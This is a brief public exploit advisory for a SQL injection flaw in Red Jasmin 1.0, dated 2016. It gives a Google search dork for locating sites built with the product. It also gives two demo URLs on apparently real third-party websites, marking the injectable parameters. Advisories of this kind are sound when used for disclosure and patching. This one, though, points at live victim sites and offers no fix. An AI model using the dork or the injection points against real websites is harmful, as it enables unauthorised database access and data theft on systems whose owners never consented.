Red Jasmin version 1.0 suffers from a remote SQL injection vulnerability.
3827c6102941e9b224129db3726300d764d480942d04e67f01301d768ca7b628
# Exploit Title : RedJasmin Sql injection vulnerability
# Date : 18/11/2016
# Exploit Author : behrouz mansoori
# Vendor Homepage : www.redjasmin.com
# Google Dork : "Designed & Developed by Redjasmin.com"
# category : webapps
# Tested on : windows 7 ,firefox
Proof of Concept :
search google Dork : "Designed & Developed by Redjasmin.com"
Demo : http://www.tmpower.net/product.php?cg_id=5'[sql injrction vulnerability]
Demo : http://www.genesis-envi.com/detail.php?pcode=a01'[sql injrction vulnerability]
# Discovered by : behrouz mansoori